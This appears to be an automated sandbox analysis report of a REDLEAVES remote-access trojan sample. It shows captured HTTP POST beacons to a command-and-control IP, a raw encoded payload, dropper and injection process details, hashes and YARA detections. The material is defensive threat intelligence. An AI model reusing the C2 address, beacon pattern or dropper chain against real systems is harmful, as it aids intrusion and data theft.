Mar 10, 2022 07:23:07.487281084 CET | 443 | 49765 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:07.487313032 CET | 443 | 49765 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:07.488965988 CET | 49766 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:07.488998890 CET | 443 | 49766 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:07.489103079 CET | 49766 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:07.489439964 CET | 49766 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:07.489464998 CET | 443 | 49766 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:07.489515066 CET | 443 | 49766 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:07.489613056 CET | 49766 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:07.489633083 CET | 443 | 49766 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:07.491219997 CET | 49767 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:07.491257906 CET | 443 | 49767 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:07.491483927 CET | 49767 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:07.491816044 CET | 49767 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:07.491835117 CET | 443 | 49767 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:07.491875887 CET | 443 | 49767 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:07.492024899 CET | 49767 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:07.492069006 CET | 443 | 49767 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:07.493947029 CET | 49768 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:07.494015932 CET | 443 | 49768 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:07.497068882 CET | 49768 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:07.497479916 CET | 49768 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:07.497514963 CET | 443 | 49768 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:07.497564077 CET | 49768 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:07.497575998 CET | 443 | 49768 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:07.497601032 CET | 443 | 49768 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:07.499073982 CET | 49769 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:07.499128103 CET | 443 | 49769 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:07.502388954 CET | 49769 | 443 | 192.168.2.4 | 67.205.132.17
    Mar 10, 2022 07:23:07.508974075 CET49769443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.509027958 CET4434976967.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.509052038 CET49769443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.509063959 CET4434976967.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.509160995 CET4434976967.205.132.17192.168.2.4
    Mar 10, 2022 07:23:12.533687115 CET4976480192.168.2.467.205.132.17
    Mar 10, 2022 07:23:17.550909042 CET49770443192.168.2.4144.168.45.116
    Mar 10, 2022 07:23:17.550981998 CET44349770144.168.45.116192.168.2.4
    Mar 10, 2022 07:23:17.551107883 CET49770443192.168.2.4144.168.45.116
    Mar 10, 2022 07:23:17.551667929 CET49770443192.168.2.4144.168.45.116
    Mar 10, 2022 07:23:17.551698923 CET44349770144.168.45.116192.168.2.4
    Mar 10, 2022 07:23:17.551769018 CET49770443192.168.2.4144.168.45.116
    Mar 10, 2022 07:23:17.551795959 CET44349770144.168.45.116192.168.2.4
    Mar 10, 2022 07:23:27.600503922 CET49771443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:27.600574970 CET4434977167.205.132.17192.168.2.4
    Mar 10, 2022 07:23:27.601896048 CET49771443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:27.602406979 CET49771443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:27.602438927 CET4434977167.205.132.17192.168.2.4
    Mar 10, 2022 07:23:27.602456093 CET49771443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:27.602464914 CET4434977167.205.132.17192.168.2.4
    Mar 10, 2022 07:23:27.602531910 CET4434977167.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.737730026 CET49772443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.737780094 CET4434977267.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.737865925 CET49772443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.738704920 CET49772443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.738723040 CET4434977267.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.738790035 CET49772443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.738800049 CET4434977267.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.738898039 CET4434977267.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.741889000 CET49773443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.741935968 CET4434977367.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.742029905 CET49773443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.745321989 CET49773443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.745356083 CET4434977367.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.745388985 CET4434977367.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.747672081 CET49774443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.747715950 CET4434977467.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.747786045 CET49774443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.748333931 CET49774443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.748358965 CET4434977467.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.748398066 CET4434977467.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.748428106 CET49774443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.748446941 CET4434977467.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.750837088 CET49775443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.750869989 CET4434977567.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.750950098 CET49775443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.760200977 CET49775443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.760236025 CET4434977567.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.760302067 CET4434977567.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.764406919 CET49776443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.764461040 CET4434977667.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.764542103 CET49776443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.765038967 CET49776443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.765058041 CET4434977667.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.765125036 CET4434977667.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.765129089 CET49776443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.765146017 CET4434977667.205.132.17192.168.2.4
    • 67.205.132.17:443
    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    0 | 192.168.2.4 | 49737 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:21:42.974839926 CET | 838 | OUT | POST /NEZTl2/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    1 | 192.168.2.4 | 49738 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:21:42.977200031 CET | 838 | OUT | POST /NEZTl2/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    10 | 192.168.2.4 | 49758 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:22:41.757384062 CET | 1124 | OUT | POST /hvnqlRD8z/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    11 | 192.168.2.4 | 49759 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:22:41.760591984 CET | 1125 | OUT | POST /hvnqlRD8z/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    12 | 192.168.2.4 | 49760 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:22:41.762743950 CET | 1126 | OUT | POST /hvnqlRD8z/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    13 | 192.168.2.4 | 49761 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:22:41.764647961 CET | 1126 | OUT | POST /hvnqlRD8z/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    14 | 192.168.2.4 | 49762 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:22:41.821583033 CET | 1127 | OUT | POST /hvnqlRD8z/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    15 | 192.168.2.4 | 49764 | 67.205.132.17 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:23:02.013122082 CET | 1128 | OUT | Data Raw: 42 0c 00 00 7a 8d 9b dc 85 00 00 00
    Data Ascii: Bz
    Mar 10, 2022 07:23:02.013169050 CET | 1128 | OUT | Data Raw: 32 75 63 6b 35 75 63 6b e2 be ba d4 2d 7a 58 da 4f d5 95 07 3e 8e 2a 26 50 b3 03 72 99 d5 c4 d4 2e e6 a5 1d c5 f5 a0 c7 b0 0c ca 99 1a 32 93 a5 a4 af 88 85 ad 3f 7b 3c 0b a2 65 15 46 f9 e0 1e ad a9 80 75 68 31 6f dc fb 1c 37 7d e2 ee 2d 6b d7 5f
    Data Ascii: 2uck5uck-zXO>*&Pr.2?{<eFuh1o7}-k_Fzs"?l@LeAS@) ]*X?oe+l-
    Mar 10, 2022 07:23:02.116496086 CET | 1129 | IN | HTTP/1.1 400 Bad Request
    Server: nginx
    Date: Thu, 10 Mar 2022 06:23:02 GMT
    Content-Type: text/html
    Content-Length: 150
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    16 | 192.168.2.4 | 49765 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:23:07.487189054 CET | 1129 | OUT | POST /23I9/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    17 | 192.168.2.4 | 49766 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:23:07.489439964 CET | 1130 | OUT | POST /23I9/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    18 | 192.168.2.4 | 49767 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:23:07.491816044 CET | 1131 | OUT | POST /23I9/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    19 | 192.168.2.4 | 49768 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:23:07.497479916 CET | 1131 | OUT | POST /23I9/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    2 | 192.168.2.4 | 49739 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:21:42.993453026 CET | 839 | OUT | POST /NEZTl2/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    20 | 192.168.2.4 | 49769 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:23:07.508974075 CET | 1132 | OUT | POST /23I9/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    21 | 192.168.2.4 | 49772 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:23:32.738704920 CET | 1135 | OUT | POST /M2c1Nb/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    22 | 192.168.2.4 | 49773 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:23:32.745321989 CET | 1136 | OUT | POST /M2c1Nb/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    23 | 192.168.2.4 | 49774 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:23:32.748333931 CET | 1136 | OUT | POST /M2c1Nb/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    24 | 192.168.2.4 | 49775 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:23:32.760200977 CET | 1137 | OUT | POST /M2c1Nb/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    25 | 192.168.2.4 | 49776 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:23:32.765038967 CET | 1138 | OUT | POST /M2c1Nb/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    3 | 192.168.2.4 | 49740 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:21:42.995886087 CET | 840 | OUT | POST /NEZTl2/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    4 | 192.168.2.4 | 49741 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:21:42.998060942 CET | 840 | OUT | POST /NEZTl2/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    5 | 192.168.2.4 | 49747 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:22:12.366818905 CET | 1112 | OUT | POST /3T3t/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    6 | 192.168.2.4 | 49748 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:22:12.369051933 CET | 1112 | OUT | POST /3T3t/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    7 | 192.168.2.4 | 49749 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:22:12.372329950 CET | 1113 | OUT | POST /3T3t/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    8 | 192.168.2.4 | 49750 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:22:12.375251055 CET | 1114 | OUT | POST /3T3t/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    9 | 192.168.2.4 | 49751 | 67.205.132.17 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp | kBytes transferred | Direction | Data
    Mar 10, 2022 07:22:12.396461010 CET | 1114 | OUT | POST /3T3t/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443



    Target ID:0
    Start time:07:21:31
    Start date:10/03/2022
    Path:C:\Users\user\Desktop\cANdLlHS4N.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\Desktop\cANdLlHS4N.exe"
    Imagebase:0x9a0000
    File size:3804160 bytes
    MD5 hash:B3139B26A2DABB9B6E728884D8FA8B33
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief, Description: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT, Source: 00000000.00000002.246163618.0000000002710000.00000004.00000800.00020000.00000000.sdmp, Author: USG
    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000000.00000002.246163618.0000000002710000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000000.00000000.235573187.0000000000CA2000.00000008.00000001.01000000.00000003.sdmp, Author: Florian Roth
    • Rule: Dropper_DeploysMalwareViaSideLoading, Description: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, Source: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp, Author: USG
    • Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn, Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, Source: 00000000.00000002.246143559.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, Author: USG
    • Rule: OpCloudHopper_Malware_6, Description: Detects malware from Operation Cloud Hopper, Source: 00000000.00000002.246143559.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
    • Rule: Dropper_DeploysMalwareViaSideLoading, Description: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, Source: 00000000.00000000.235322946.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp, Author: USG
    • Rule: Dropper_DeploysMalwareViaSideLoading, Description: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, Source: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Author: USG
    • Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn, Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, Source: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, Author: USG
    • Rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief, Description: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT, Source: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, Author: USG
    • Rule: Dropper_DeploysMalwareViaSideLoading, Description: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, Source: 00000000.00000000.235102933.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Author: USG
    Reputation:low

    Target ID:1
    Start time:07:21:33
    Start date:10/03/2022
    Path:C:\Users\user\AppData\Local\Temp\obedience.exe
    Wow64 process (32bit):true
    Commandline:C:\Users\user\AppData\Local\Temp\obedience.exe
    Imagebase:0x400000
    File size:1616040 bytes
    MD5 hash:6A1C14D5F16A07BEF55943134FE618C0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:Borland Delphi
    Yara matches:
    • Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn, Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, Source: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Author: USG
    • Rule: REDLEAVES_CoreImplant_UniqueStrings, Description: Strings identifying the core REDLEAVES RAT in its deobfuscated state, Source: 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Author: USG
    • Rule: malware_red_leaves_generic, Description: Red Leaves malware, related to APT10, Source: 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Author: David Cannings
    • Rule: RedLeaf, Description: RedLeaf crypto function, Source: 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Author: kev
    Antivirus matches:
    • Detection: 8%, Metadefender, Browse
    • Detection: 9%, ReversingLabs
    Reputation:low

    Target ID:2
    Start time:07:21:35
    Start date:10/03/2022
    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Wow64 process (32bit):true
    Commandline:C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Imagebase:0x920000
    File size:822536 bytes
    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: REDLEAVES_CoreImplant_UniqueStrings, Description: Strings identifying the core REDLEAVES RAT in its deobfuscated state, Source: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: USG
    • Rule: malware_red_leaves_generic, Description: Red Leaves malware, related to APT10, Source: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: David Cannings
    • Rule: RedLeaf, Description: RedLeaf crypto function, Source: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: kev
    • Rule: REDLEAVES_CoreImplant_UniqueStrings, Description: Strings identifying the core REDLEAVES RAT in its deobfuscated state, Source: 00000002.00000000.244543247.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: USG
    • Rule: malware_red_leaves_generic, Description: Red Leaves malware, related to APT10, Source: 00000002.00000000.244543247.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: David Cannings
    • Rule: RedLeaf, Description: RedLeaf crypto function, Source: 00000002.00000000.244543247.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: kev
    • Rule: REDLEAVES_CoreImplant_UniqueStrings, Description: Strings identifying the core REDLEAVES RAT in its deobfuscated state, Source: 00000002.00000000.244858067.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: USG
    • Rule: malware_red_leaves_generic, Description: Red Leaves malware, related to APT10, Source: 00000002.00000000.244858067.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: David Cannings
    • Rule: RedLeaf, Description: RedLeaf crypto function, Source: 00000002.00000000.244858067.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: kev
    • Rule: REDLEAVES_CoreImplant_UniqueStrings, Description: Strings identifying the core REDLEAVES RAT in its deobfuscated state, Source: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Author: USG
    • Rule: malware_red_leaves_generic, Description: Red Leaves malware, related to APT10, Source: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Author: David Cannings
    • Rule: RedLeaves, Description: detect RedLeaves in memory, Source: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
    Reputation:high

    Target ID:3
    Start time:07:21:44
    Start date:10/03/2022
    Path:C:\Users\user\AppData\Local\Temp\obedience.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\AppData\Local\Temp\obedience.exe"
    Imagebase:0x400000
    File size:1616040 bytes
    MD5 hash:6A1C14D5F16A07BEF55943134FE618C0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:Borland Delphi
    Yara matches:
    • Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn, Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, Source: 00000003.00000002.273655894.000000006EE51000.00000020.00000001.01000000.00000005.sdmp, Author: USG
    • Rule: REDLEAVES_CoreImplant_UniqueStrings, Description: Strings identifying the core REDLEAVES RAT in its deobfuscated state, Source: 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp, Author: USG
    • Rule: malware_red_leaves_generic, Description: Red Leaves malware, related to APT10, Source: 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp, Author: David Cannings
    • Rule: RedLeaf, Description: RedLeaf crypto function, Source: 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp, Author: kev
    Reputation:low

    Target ID:4
    Start time:07:21:46
    Start date:10/03/2022
    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Wow64 process (32bit):
    Commandline:C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Imagebase:
    File size:822536 bytes
    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

      Execution Graph

      Execution Coverage:9.2%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:2.1%
      Total number of Nodes:1408
      Total number of Limit Nodes:52
      execution_graph: node and edge listing of the report's interactive call graph (node ids, code addresses and resolved API names such as CallNextHookEx, UnhookWindowsHookEx, GetPropA, SetWindowLongA, GlobalAddAtomA, TlsAlloc, EnterCriticalSection, LoadIconW, LoadMenuA, FindResourceW, WideCharToMultiByte); the raw serialized graph data is not reproduced here.
